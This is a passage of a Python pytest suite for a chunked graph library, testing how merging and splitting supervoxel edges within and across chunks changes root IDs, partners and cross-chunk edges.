vertices=[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 1, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 1, 0, 0),
to_label(cgraph, 1, 1, 1, 0, 0), inf),
(to_label(cgraph, 1, 0, 1, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 1, 0, 0),
to_label(cgraph, 1, 0, 1, 0, 0), inf)])
cgraph.add_layer(3,
np.array([[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0]]))
rr = cgraph.range_read_chunk(
chunk_id=cgraph.get_chunk_id(layer=3, x=0, y=0, z=0))
root_ids_t0 = list(rr.keys())
assert len(root_ids_t0) == 2
child_ids = []
for root_id in root_ids_t0:
cgraph.logger.debug(("root_id", root_id))
child_ids.extend(cgraph.get_subgraph_nodes(root_id))
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 1)],
affinities=[.5])
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
assert len(np.unique(root_ids)) == 1
root_id = root_ids[0]
assert root_id == new_roots[0]
cross_edge_dict_layers = graph_tests.root_cross_edge_test(root_id,
cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(
len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
@pytest.mark.timeout(30)
def test_cross_edges(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─...─┬────────┬─────┐ ┌─...─┬────────┬─────┐
| │ A¹ │ B¹ │ | │ A¹ │ B¹ │
| │ 4 1━━┿━━5 │ => | │ 4━━1━━┿━━5 │
| │ / │ | │ | │ / │ │
| │ 3 2━━┿━━6 │ | │ 3 2━━┿━━6 │
└─...─┴────────┴─────┘ └─...─┴────────┴─────┘
"""
cgraph = gen_graph(n_layers=6)
chunk_offset = 6
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset, 0, 0, 0), to_label(cgraph, 1, chunk_offset, 0, 0, 1),
to_label(cgraph, 1, chunk_offset, 0, 0, 2), to_label(cgraph, 1, chunk_offset, 0, 0, 3)],
edges=[(to_label(cgraph, 1, chunk_offset, 0, 0, 0), to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset, 0, 0, 1), to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), inf),
(to_label(cgraph, 1, chunk_offset, 0, 0, 0), to_label(cgraph, 1, chunk_offset, 0, 0, 2), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), to_label(cgraph, 1, chunk_offset+1, 0, 0, 1)],
edges=[(to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), to_label(cgraph, 1, chunk_offset, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), to_label(cgraph, 1, chunk_offset, 0, 0, 1), inf),
(to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), to_label(cgraph, 1, chunk_offset+2, 0, 0, 1), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 1)],
edges=[(to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+1, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+2, 0, 0, 1), to_label(cgraph, 1, chunk_offset+1, 0, 0, 1), inf),
(to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 1), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+3, 0, 0, 0)],
edges=[(to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), to_label(cgraph, 1, chunk_offset+2, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk E
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+4, 0, 0, 0)],
edges=[(to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), to_label(cgraph, 1, chunk_offset+3, 0, 0, 0), inf),
(to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), to_label(cgraph, 1, chunk_offset+5, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk F
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, chunk_offset+5, 0, 0, 0)],
edges=[(to_label(cgraph, 1, chunk_offset+5, 0, 0, 0), to_label(cgraph, 1, chunk_offset+4, 0, 0, 0), inf)],
timestamp=fake_timestamp)
for i_layer in range(3, 7):
for i_chunk in range(0, 2 ** (7 - i_layer), 2):
cgraph.add_layer(i_layer, np.array([[i_chunk, 0, 0], [i_chunk+1, 0, 0]]), time_stamp=fake_timestamp)
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, chunk_offset, 0, 0, 0),
to_label(cgraph, 1, chunk_offset, 0, 0, 3)],
affinities=.9)
assert len(new_roots) == 1
root_id = new_roots[0]
cross_edge_dict_layers = graph_tests.root_cross_edge_test(root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(
len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
cgraph.logger.debug("LAYER %d" % layer)
assert len(np.unique(n_cross_edges_layer[layer])) == 1
class TestGraphSplit:
@pytest.mark.timeout(30)
def test_split_pair_same_chunk(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (same chunk)
Expected: Different (new) parents for RG 1 and 2 on Layer two
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1 2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)],
timestamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 1) in leaves
# Check Old State still accessible
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp) == \
cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1), time_stamp=fake_timestamp)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
# assert len(cgraph.get_latest_roots()) == 2
# assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
def test_split_nonexisting_edge(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (same chunk)
Expected: Different (new) parents for RG 1 and 2 on Layer two
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1━2 │
│ | │ │ | │
│ 3 │ │ 3 │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 2), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)],
timestamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 2), mincut=False)
assert len(new_root_ids) == 1
assert len(cgraph.get_atomic_node_partners(to_label(cgraph, 1, 0, 0, 0, 0))) == 1
@pytest.mark.timeout(30)
def test_split_pair_neighboring_chunks(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1━━┿━━2 │ => │ 1 │ 2 │
│ │ │ │ │ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 1.0)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 1.0)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in leaves
# Check Old State still accessible
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp) == \
cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0), time_stamp=fake_timestamp)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 1, 0, 0, 0)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
assert len(cgraph.get_latest_roots()) == 2
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_verify_cross_chunk_edges(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┬─────┐ ┌─────┬─────┬─────┐
| │ A¹ │ B¹ │ | │ A¹ │ B¹ │
| │ 1━━┿━━3 │ => | │ 1━━┿━━3 │
| │ | │ │ | │ │ │
| │ 2 │ │ | │ 2 │ │
└─────┴─────┴─────┘ └─────┴─────┴─────┘
"""
cgraph = gen_graph(n_layers=4)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 2, 0, 0, 0), inf),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 2, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 2, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[2, 0, 0], [3, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0))
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1), mincut=False)
svs2 = cgraph.get_subgraph_nodes(new_root_ids[0])
svs1 = cgraph.get_subgraph_nodes(new_root_ids[1])
len_set = {1, 2}
assert len(svs1) in len_set
len_set.remove(len(svs1))
assert len(svs2) in len_set
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0))
cc_dict = cgraph.get_atomic_cross_edge_dict(cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0)))
assert len(cc_dict[3]) == 1
assert cc_dict[3][0][0] == to_label(cgraph, 1, 1, 0, 0, 0)
assert cc_dict[3][0][1] == to_label(cgraph, 1, 2, 0, 0, 0)
assert len(cgraph.get_latest_roots()) == 2
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_verify_loop(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬────────┬─────┐ ┌─────┬────────┬─────┐
| │ A¹ │ B¹ │ | │ A¹ │ B¹ │
| │ 4━━1━━┿━━5 │ => | │ 4 1━━┿━━5 │
| │ / │ | │ | │ │ | │
| │ 3 2━━┿━━6 │ | │ 3 2━━┿━━6 │
└─────┴────────┴─────┘ └─────┴────────┴─────┘
"""
cgraph = gen_graph(n_layers=4)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 2), to_label(cgraph, 1, 1, 0, 0, 3)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 2, 0, 0, 0), inf),
(to_label(cgraph, 1, 1, 0, 0, 1), to_label(cgraph, 1, 2, 0, 0, 1), inf),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 2), .5),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 3), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 2, 0, 0, 0), to_label(cgraph, 1, 2, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 2, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 2, 0, 0, 1), to_label(cgraph, 1, 1, 0, 0, 1), inf),
(to_label(cgraph, 1, 2, 0, 0, 1), to_label(cgraph, 1, 2, 0, 0, 0), .5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[2, 0, 0], [3, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0))
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 2), mincut=False)
assert len(new_root_ids) == 2
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 3), mincut=False)
assert len(new_root_ids) == 2
cc_dict = cgraph.get_atomic_cross_edge_dict(cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0)))
assert len(cc_dict[3]) == 1
cc_dict = cgraph.get_atomic_cross_edge_dict(cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0)))
assert len(cc_dict[3]) == 1
assert len(cgraph.get_latest_roots()) == 3
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_pair_disconnected_chunks(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1━━┿━━━━━┿━━2 │ => │ 1 │ │ 2 │
│ │ │ │ │ │ │ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 127, 127, 127, 0), 1.0)],
timestamp=fake_timestamp)
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[(to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0), 1.0)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Split
new_roots = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_roots) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 127, 127, 127, 0) in leaves
# Check Old State still accessible
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp) == \
cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0), time_stamp=fake_timestamp)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 127, 127, 127, 0)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 127, 127, 127, 0) in leaves
@pytest.mark.timeout(30)
def test_split_pair_already_disconnected(self, gen_graph):
"""
Try to remove edge between already disconnected RG supervoxels 1 and 2 (same chunk).
Expected: No change, no error
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1 2 │ => │ 1 2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Split
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
res_new = cgraph.table.read_rows()
res_new.consume_all()
# Check
if res_old.rows != res_new.rows:
warn("Rows were modified when splitting a pair of already disconnected supervoxels. "
"While probably not an error, it is an unnecessary operation.")
@pytest.mark.timeout(30)
def test_split_full_circle_to_triple_chain_same_chunk(self, gen_graph):
"""
Remove direct edge between RG supervoxels 1 and 2, but leave indirect connection (same chunk)
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1 2 │
│ ┗3┛ │ │ ┗3┛ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 2), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.3)],
timestamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 1
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2)) == new_root_ids[0]
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 2)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 2)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 2))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_ids[0]))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 2) in leaves
# Check Old State still accessible
old_root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert new_root_ids[0] != old_root_id
# assert len(cgraph.get_latest_roots()) == 1
# assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_full_circle_to_triple_chain_neighboring_chunks(self, gen_graph):
"""
Remove direct edge between RG supervoxels 1 and 2, but leave indirect connection (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1━━┿━━2 │ => │ 1 │ 2 │
│ ┗3━┿━━┛ │ │ ┗3━┿━━┛ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 1, 0, 0, 0), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 0.3)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.3)],
timestamp=fake_timestamp)
